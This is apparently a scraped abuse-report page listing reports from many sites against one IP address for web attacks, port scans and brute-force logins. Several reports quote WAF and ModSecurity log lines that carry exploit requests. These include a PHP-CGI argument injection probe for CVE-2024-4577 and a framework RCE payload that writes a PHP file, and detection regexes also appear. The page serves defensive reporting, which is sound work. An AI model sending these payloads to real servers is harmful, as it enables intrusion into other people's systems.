yukon.ca
2024-11-10 04:33:55
(1 month ago)
Web Server Enforcement Violation: PHP CGI Argument Injection (CVE-2024-4577)
Port:80
Hacking
Exploited Host
subnetprotocol
2024-11-10 02:23:54
(1 month ago)
10/Nov/2024:03:23:53.462145 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 10/Nov/2024:03:23:53.462145 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 150.109.13.113] ModSecurity: Warning. Pattern match "(?:<\\\\\\\\?(?:[^x]|x[^m]|xm[^l]|xml[^\\\\\\\\s]|xml$|$)|<\\\\\\\\?php|\\\\\\\\[(?:\\\\\\\\/|\\\\\\\\\\\\\\\\)?php\\\\\\\\])" at ARGS_NAMES:<?php echo md5("cmd"); ?>. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "66"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <?p found within ARGS_NAMES:<?php echo md5(\\\\x22cmd\\\\x22); ?>: <?php echo md5(\\\\x22cmd\\\\x22); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/242"] [hostname "www.subnetprotocol.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "ZzAZOQ994egrNdHQnT1pcAAAAFI"]
10/Nov/2024:03:23:53.462145 +0100Apache-Error: [fi
... show less
Hacking
Web App Attack
thefoofighter
2024-11-09 23:58:27
(1 month ago)
[Sat Nov 09 23:58:26.706878 2024] [:error] [pid 3452356] [client 150.109.13.113:52623] [client 150.1 ... show more [Sat Nov 09 23:58:26.706878 2024] [:error] [pid 3452356] [client 150.109.13.113:52623] [client 150.109.13.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "93"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sourcemodding.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "Zy_3Il6vApa9NN8xHP1JlQAAAAc"], referer: https://www.sourcemodding.com/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
[Sat Nov 09 23:58:27.736154 2024] [:error] [pid 3452356] [client 150.109.13.113:52623] [client 150.109.13.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLO
... show less
Bad Web Bot
Web App Attack
paissangroup
2024-11-09 22:08:54
(1 month ago)
Multiple WAF Violations
Web App Attack
CrystalMaker
2024-11-09 20:36:00
(1 month ago)
PHP vulnerability scan - GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file% ... show more PHP vulnerability scan - GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input; GET /index.php?s=captcha; GET /xxxx.php show less
Web App Attack
AbuseIPDB
AbuseIPDB Official
2024-11-09 17:11:42
(1 month ago)
Suspicious Operation. Request content:
_method=__construct&method=GET&filter[]=system&get[]=ec ... show more Suspicious Operation. Request content:
_method=__construct&method=GET&filter[]=system&get[]=echo ^xinghuoxise^--xinghuoxise >xxxx.php show less
Web App Attack
oh.mg
2024-11-09 13:24:07
(1 month ago)
(mod_security) mod_security (id:949110) triggered by 150.109.13.113 (SG/Singapore/-): 1 in the last ... show more (mod_security) mod_security (id:949110) triggered by 150.109.13.113 (SG/Singapore/-): 1 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_TRIGGER; Logs: [Sat Nov 09 13:23:59.715796 2024] [:error] [pid 3037359:tid 140622807664384] [client 150.109.13.113:54895] [client 150.109.13.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "184"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [ver "OWASP_CRS/4.0.0-rc1"] [tag "anomaly-evaluation"] [hostname "oh.mg"] [uri "/index.php"] [unique_id "Zy9ib4IsltiqjL-nIm2@MAAAAEw"], referer: https://oh.mg/index.php?s=captcha show less
Port Scan
Anonymous
2024-11-08 13:24:45
(1 month ago)
(wordpress) Failed wordpress login from 150.109.13.113 (SG/Singapore/-/Singapore/-/[redacted])
Brute-Force
TPI-Abuse
2024-11-08 03:24:27
(1 month ago)
(mod_security) mod_security (id:240335) triggered by 150.109.13.113 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:240335) triggered by 150.109.13.113 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 07 22:24:21.270863 2024] [security2:error] [pid 3099:tid 3099] [client 150.109.13.113:64003] [client 150.109.13.113] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 150.109.13.113 (+1 hits since last alert)|procigar.org|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "procigar.org"] [uri "/xmlrpc.php"] [unique_id "Zy2EZZzJFGZRPRYTxGyLJQAAAAk"], referer: https://procigar.org/xmlrpc.php show less
Brute-Force
Bad Web Bot
Web App Attack
cmbplf
2024-11-07 22:00:06
(1 month ago)
5.333 POST requests in 1 hour (1w6d18h)
Brute-Force
Bad Web Bot
Anonymous
2024-10-29 13:04:16
(1 month ago)
Web App Attack
Cloudkul Cloudkul
2024-10-29 01:25:06
(1 month ago)
Attempted Not Found (404 status code) requests on our application, more than 30% of their total requ ... show more Attempted Not Found (404 status code) requests on our application, more than 30% of their total requests. show less
Brute-Force
Web App Attack
COMAITE
2024-10-28 10:10:16
(1 month ago)
Multiple web server 400 error codes from same source ip 150.109.13.113.
Web App Attack
FeG Deutschland
2024-10-28 09:24:03
(1 month ago)
Looking for CMS/PHP/SQL vulnerablilities - 13
Exploited Host
Web App Attack
Anonymous
2024-10-26 00:33:00
(1 month ago)
WAF detection: Cross-site scripting
Hacking